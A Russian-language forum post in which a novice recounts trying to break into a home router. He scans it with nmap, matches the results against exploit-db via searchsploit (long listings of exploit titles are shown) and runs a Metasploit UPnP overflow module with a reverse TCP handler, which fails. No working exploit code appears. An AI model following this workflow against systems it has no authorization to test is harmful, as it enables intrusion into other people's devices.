| [28159] SSH Tectia Management Agent sshd Restart Local Privilege Escalation
| [25463] freeSSHd Key Exchange Algorithm String Remote Overflow
| [23960] Dropbear SSH Authorization-pending Connection Saturation DoS
| [21847] Dropbear SSH Server svr_ses.childpidsize Remote Overflow
| [8138] Dropbear SSH Server buffer.c Overflow Issue
| [8137] Dropbear SSH Server DSS Verification Failure Remote Privilege Escalation
| [8040] sshd Authentication Agent Mechanism Arbitrary User Credential Disclosure
| [8039] Bitvise WinSSHD Incomplete Connection Saturation DoS
| [8037] Rapidstream VPN sshd Default Hardcoded Admin Account
| [8035] SSH Server sshd2 Failed Login Attempt Logging Failure
| [5010] Solaris SSHD Client IP Logging Failure
| [2429] Dropbear SSH Server Username Remote Format String
| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
| [1773] SSH sshd Connection Saturation DoS
| [1586] sshd scp Traversal Arbitrary File Overwrite

на сколько я понял глазками надо это все перебирать по очереди?

| [CVE-2012-0920] Use-after-free vulnerability in Dropbear SSH Server 0.52 through 2012.54, when command restriction and public key authentication are enabled, allows remote authenticated users to execute arbitrary code and bypass command restrictions via multiple crafted command requests, related to "channels concurrency."

не подходит, только для авторизированных юзеров (предположим, что там не admin:admin)

| [123110] Dropbear up to 2018.76 svr-auth.c recv_msg_userauth_request Messages information disclosure
уязвимость есть, описана даже подробно. эксплоита - нету.

следующая
| [101509] Dropbear up to 2017.74 TCP Listener Double-Free privilege escalation
A single authentication is needed for exploitation. Neither technical details nor an exploit are publicly available.

....час колупаний...

наконец
| [81407] Dropbear SSH up to 2016.71 Shell Command Restriction CRLF privilege escalation

The attack may be initiated remotely. A single authentication is required for exploitation. Technical details are unknown but a public exploit is available.

It is declared as proof-of-concept. The exploit is available at exploit-db.com.

если мы залогинились по SSH то зачем нам инжектить команды? мы ж их прописать можем. наверное если логинимся как guest то можем выполнять как root? ладно, сейчас не о том.

в конечном итоге я уперся носом в то что вы и написали, в exploit-db. как только вывод нмап совместить с searchsploit?
наверное надо почитать мануал...
и почему так много уязвимостей и так мало сплоитов?
и почему чем больше ответов - тем больше вопросов?
ааа

       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
                                Use "-v" (verbose) to try even more combinations

так, а его запускать с NSE или просто? надо и так и так попробовать...

nmap -sV -oX router.xml 192.168.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-20 03:49 EST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Service scan Timing: About 75.00% done; ETC: 03:50 (0:00:05 remaining)
Segmentation fault

шо-шо? всмысле?

перезапустил, отсканил, а вывод дописывается в файл или перезаписывает? попробую

#searchsploit --nmap router.xml
[i] SearchSploit's XML mode (without verbose enabled).   To enable: searchsploit -v --xml...
[i] Reading: 'router.xml'

[i] /usr/local/bin/searchsploit -t dropbear sshd 2012 55
[i] /usr/local/bin/searchsploit -t domain
[-] Skipping output: domain   (Too many results. Please re-search manually: /usr/local/bin/searchsploit -t domain)

[i] /usr/local/bin/searchsploit -t tp link td w8968 http admin
[i] /usr/local/bin/searchsploit -t portable sdk for upnp devices 1 6 19

/usr/local/bin/searchsploit -t dropbear sshd 2012 55
Exploits: No Result
Shellcodes: No Result

та как нет если ты ж сказал что есть?

Ссылка скрыта от гостей

вот же?


мяяяяуууу. что я делаю не так?
ану с -v попробую

#searchsploit --nmap router.xml -v
[i] Reading: 'router.xml'

[i] /usr/local/bin/searchsploit -t dropbear
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Exploit Title                                                                                                                                              |  Path
                                                                                                                                                            | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
DropBearSSHD 2015.71 - Command Injection                                                                                                                    | exploits/linux/remote/40119.md
Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service                                                                                          | exploits/multiple/dos/1572.pl
Dropbear SSH 0.34 - Remote Code Execution                                                                                                                   | exploits/linux/remote/387.c
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result


[i] /usr/local/bin/searchsploit -t dropbear sshd
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Exploit Title                                                                                                                                              |  Path
                                                                                                                                                            | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
DropBearSSHD 2015.71 - Command Injection                                                                                                                    | exploits/linux/remote/40119.md
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result


[i] /usr/local/bin/searchsploit -t dropbear sshd 2012



[i] /usr/local/bin/searchsploit -t domain
[-] Skipping output: domain    (Too many results. Please re-search manually: /usr/local/bin/searchsploit -t domain )




[i] /usr/local/bin/searchsploit -t tp
[-] Skipping output: tp    (Too many results. Please re-search manually: /usr/local/bin/searchsploit -t tp )

[i] /usr/local/bin/searchsploit -t tp link
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Exploit Title                                                                                                                                              |  Path
                                                                                                                                                            | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Ascend CascadeView/UX 1.0 tftpd - Symbolic Link                                                                                                             | exploits/unix/local/19707.sh
D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service                                                                                                       | exploits/hardware/dos/27241.c
D-Link TFTP 1.0 - 'Filename' Remote Buffer Overflow (Metasploit)                                                                                            | exploits/windows/remote/16345.rb
D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow                                                                                                  | exploits/hardware/remote/29735.rb
Linksys WAG54G v2 Wireless ADSL Router - HTTPd Denial of Service                                                                                            | exploits/hardware/dos/7535.php
Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service                                                          | exploits/hardware/dos/21978.txt
Linksys WRH54G 1.1.3 Wireless-G Router - HTTP Request Denial of Service                                                                                     | exploits/hardware/dos/31884.txt
MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting                                                                                                | exploits/php/webapps/6971.txt
MatPo Link 1.2b - SQL Injection                                                                                                                             | exploits/php/webapps/6967.txt
NX5Linkx 1.0 - 'links.php' HTTP Response Splitting                                                                                                          | exploits/php/webapps/28568.txt
TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow (PoC)                                                                                           | exploits/windows/dos/38703.txt
TECO TP3-PCLINK 2.1 - '.tpc' Handling Buffer Overflow (PoC)                                                                                                 | exploits/windows/dos/38702.txt
TP-LINK TD-W8151N - Denial of Service                                                                                                                       | exploits/hardware/dos/40910.txt
TP-LINK TD-W8951ND - Denial of Service                                                                                                                      | exploits/hardware/dos/40886.py
TP-LINK TDDP - Multiple Vulnerabilities                                                                                                                     | exploits/hardware/dos/40814.txt
TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting                                                                                                        | exploits/hardware/webapps/46882.t
TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow                                                                                                            | exploits/hardware/remote/46678.py
TP-Link - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities                                                                                   | exploits/hardware/webapps/24483.t
TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)                                                      | exploits/hardware/webapps/45811.r
TP-Link Archer CR-700 - Cross-Site Scripting                                                                                                                | exploits/hardware/webapps/40432.t
TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)                                                                         | exploits/hardware/webapps/45173.r
TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)                                                                                  | exploits/hardware/webapps/45172.r
TP-Link Gateway 3.12.4 - Multiple Vulnerabilities                                                                                                           | exploits/hardware/webapps/19774.t
TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities                                                                                            | exploits/hardware/webapps/25812.t
TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials                                                                                     | exploits/hardware/remote/38186.tx
TP-Link PS110U Print Server TL - Sensitive Information Enumeration                                                                                          | exploits/hardware/remote/26318.py
TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery                                                                                   | exploits/hardware/webapps/24928.t
TP-Link TD-8840t - Cross-Site Request Forgery                                                                                                               | exploits/hardware/webapps/29924.t
TP-Link TD-W8950ND ADSL2+ - Remote DNS Change                                                                                                               | exploits/hardware/webapps/37238.t
TP-Link TD-W8951ND - Multiple Vulnerabilities                                                                                                               | exploits/hardware/webapps/28055.t
TP-Link TL-MR3220 - Cross-Site Scripting                                                                                                                    | exploits/hardware/webapps/43023.t
TP-Link TL-PS110U / TL-PS110P - Cross-Site Scripting                                                                                                        | exploits/hardware/webapps/17113.t
TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass                                                                                           | exploits/hardware/remote/38591.py
TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure                                                                                                           | exploits/hardware/webapps/45632.t
TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities                                                                                                     | exploits/hardware/webapps/27289.t
TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities                                                                                                   | exploits/hardware/webapps/24504.t
TP-Link TL-WA850RE - Remote Command Execution                                                                                                               | exploits/hardware/webapps/44912.p
TP-Link TL-WR1043N Router - Cross-Site Request Forgery                                                                                                      | exploits/hardware/remote/38492.ht
TP-Link TL-WR1043ND 2 - Authentication Bypass                                                                                                               | exploits/hardware/webapps/47483.p
TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities                                                                | exploits/hardware/remote/38308.tx
TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities                                                                                                   | exploits/hardware/webapps/34583.t
TP-Link TL-WR740N - Cross-Site Scripting                                                                                                                    | exploits/hardware/webapps/43148.t
TP-Link TL-WR740N - Denial of Service                                                                                                                       | exploits/hardware/dos/35345.txt
TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service                                                                         | exploits/hardware/dos/29919.py
TP-Link TL-WR740N 111130 - 'ping_addr' HTML Injection                                                                                                       | exploits/hardware/remote/36945.tx
TP-Link TL-WR740N Wireless Router - Denial of Service                                                                                                       | exploits/hardware/dos/24866.txt
TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution                                                                    | exploits/hardware/webapps/34254.t
TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities                                                                         | exploits/hardware/dos/38483.txt
TP-Link TL-WR840N - Denial of Service                                                                                                                       | exploits/hardware/dos/45064.txt
TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass                                                                                                          | exploits/hardware/webapps/44781.t
TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities                                                                                                   | exploits/hardware/webapps/34584.t
TP-Link TL-WR841N Router - Local File Inclusion                                                                                                             | exploits/hardware/webapps/37982.p
TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot                                                                                                     | exploits/hardware/webapps/47958.t
TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot                                                                                        | exploits/hardware/webapps/44550.t
TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities                                                                                | exploits/hardware/webapps/29802.t
TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)                                                                                                         | exploits/hardware/dos/45203.txt
TP-Link WR842ND - Remote Multiple SSID Directory Traversals                                                                                                 | exploits/hardware/webapps/25810.p
TP-Link WR940N - (Authenticated) Remote Code                                                                                                                | exploits/hardware/webapps/43022.p
TP-Link Wireless N Router WR840N - Denial of Service (PoC)                                                                                                  | exploits/hardware/dos/45168.txt
TP-Link wireless router Archer C1200 - Cross-Site Scripting                                                                                                 | exploits/hardware/webapps/45970.t
Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting                                                                                                 | exploits/hardware/webapps/40837.t
Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service                                                                           | exploits/hardware/dos/22596.txt
Xlink FTP Client - Remote Buffer Overflow (Metasploit)                                                                                                      | exploits/windows/remote/16722.rb
Xlink FTP Server - Remote Buffer Overflow (Metasploit)                                                                                                      | exploits/windows/remote/16718.rb
Yealink VoIP Phones - '/servlet' HTTP Response Splitting                                                                                                    | exploits/java/webapps/39334.txt
ZTE / TP-Link RomPager - Denial of Service                                                                                                                  | exploits/hardware/dos/33737.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result


[i] /usr/local/bin/searchsploit -t tp link td
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Exploit Title                                                                                                                                              |  Path
                                                                                                                                                            | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
TP-LINK TD-W8151N - Denial of Service                                                                                                                       | exploits/hardware/dos/40910.txt
TP-LINK TD-W8951ND - Denial of Service                                                                                                                      | exploits/hardware/dos/40886.py
TP-LINK TDDP - Multiple Vulnerabilities                                                                                                                     | exploits/hardware/dos/40814.txt
TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery                                                                                   | exploits/hardware/webapps/24928.t
TP-Link TD-8840t - Cross-Site Request Forgery                                                                                                               | exploits/hardware/webapps/29924.t
TP-Link TD-W8950ND ADSL2+ - Remote DNS Change                                                                                                               | exploits/hardware/webapps/37238.t
TP-Link TD-W8951ND - Multiple Vulnerabilities                                                                                                               | exploits/hardware/webapps/28055.t
Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting                                                                                                 | exploits/hardware/webapps/40837.t
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result


[i] /usr/local/bin/searchsploit -t tp link td w8968



[i] /usr/local/bin/searchsploit -t portable
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Exploit Title                                                                                                                                              |  Path
                                                                                                                                                            | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (1)                                                                                               | exploits/windows/local/8519.pl
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)                                                                                               | exploits/windows/local/8520.py
CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)                                                                                              | exploits/windows/dos/8489.pl
CoolPlayer Portable 2.19.1 - 'Skin' Local Buffer Overflow                                                                                                   | exploits/windows/local/8527.py
CoolPlayer Portable 2.19.2 - Local Buffer Overflow                                                                                                          | exploits/windows/local/17294.py
CoolPlayer Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass) (1)                                                                                        | exploits/windows/local/17780.py
CoolPlayer Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass) (2)                                                                                        | exploits/windows/local/20262.py
CoolPlayer Portable 2.19.2 - Local Buffer Overflow (Metasploit)                                                                                             | exploits/windows/local/17499.rb
CoolPlayer+ Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass)                                                                                           | exploits/windows/local/20296.rb
CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow                                                                                                         | exploits/windows/dos/29613.txt
CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)                                                                          | exploits/windows/local/40151.py
KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)                                                                           | exploits/windows/local/39121.py
KiTTY Portable 0.65.0.2p (Windows 8.1/10) - Local kitty.ini Overflow                                                                                        | exploits/windows/local/39122.py
KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)                                                                              | exploits/windows/remote/39119.py
KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)                                                         | exploits/windows/local/39120.py
Portable AVS DVD Authoring 1.3.3.51 - Local Crash (PoC)                                                                                                     | exploits/windows/dos/12074.pl
Portable Document Format - Specification Signature Collision                                                                                                | exploits/windows/remote/34437.txt
Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow                                                                                          | exploits/windows/local/9659.cpp
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack                                                                                                        | exploits/multiple/remote/3303.sh
Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)                                                                              | exploits/unix/remote/24455.rb
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)                                                                            | exploits/solaris/local/28788.sh
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)                                                                            | exploits/solaris/local/28789.sh
UMPlayer Portable 0.95 - Crash (PoC)                                                                                                                        | exploits/windows/dos/23003.py
WordPress Plugin Portable phpMyAdmin - Authentication Bypass                                                                                                | exploits/php/webapps/23356.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result


[i] /usr/local/bin/searchsploit -t portable sdk
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Exploit Title                                                                                                                                              |  Path
                                                                                                                                                            | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Portable UPnP SDK - 'unique_service_name()' Remote Code Execution (Metasploit)                                                                              | exploits/unix/remote/24455.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result


[i] /usr/local/bin/searchsploit -t portable sdk for

И что дальше отсюда выбирать и куда нажимать? куда писать локалхосты, тема не раскрыта

приколько им было в 2003. кнопочка похекать весь мир. интересно, сегодня есть такие?

#cat /opt/exploitdb/exploits/linux/remote/387.c
/*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live

ладно, 2012 год
#cat /opt/exploitdb/exploits/unix/remote/24455.rb
а у нас
Dropbear sshd 2012.55

msfco->TAB
=[ metasploit v5.0.46-dev ]

msf5 > use exploit/multi/upnp/libupnp_ssdp_overflow
msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > show options

Module options (exploit/multi/upnp/libupnp_ssdp_overflow):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   CBHOST                   no        The listener address used for staging the real payload
   CBPORT                   no        The listener port used for staging the real payload
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   1900             yes       The target port

так

msf5 exploit(multi/upnp/libupnp_ssdp_overflow) > exploit

[*] Started reverse TCP double handler on 192.168.0.113:4444
[*] No target matches this fingerprint
[*]
[*]     HTTP/1.1 200 OK
[*]     CACHE-CONTROL: max-age=300
[*]     DATE: Thu, 20 Feb 2020 02:24:38 GMT
[*]     EXT:
[*]     LOCATION: http://192.168.0.1:1900/gatedesc.xml
[*]     OPT: "http://schemas.upnp.org/upnp/1/0/"; ns=01
[*]     01-NLS: 169b5140-1dd2-11b2-978a-b417fba7b665
[*]     SERVER: Linux/2.6.36, UPnP/1.0, Portable SDK for UPnP devices/1.6.19
[*]     X-User-Agent: redsonic
[*]     ST: upnp:rootdevice
[*]     USN: uuid:9f0865b3-f5da-4ad5-85b7-7404637fdf37::upnp:rootdevice
[*]    
[*]
[-] Exploit aborted due to failure: no-target: No compatible target detected
[*] Exploit completed, but no session was created.

а может такое быть тошо порты не открыты? мой ноут забрали господа милиционеры, и теперь я со старой разломаной леново...
#ufw status Status: inactive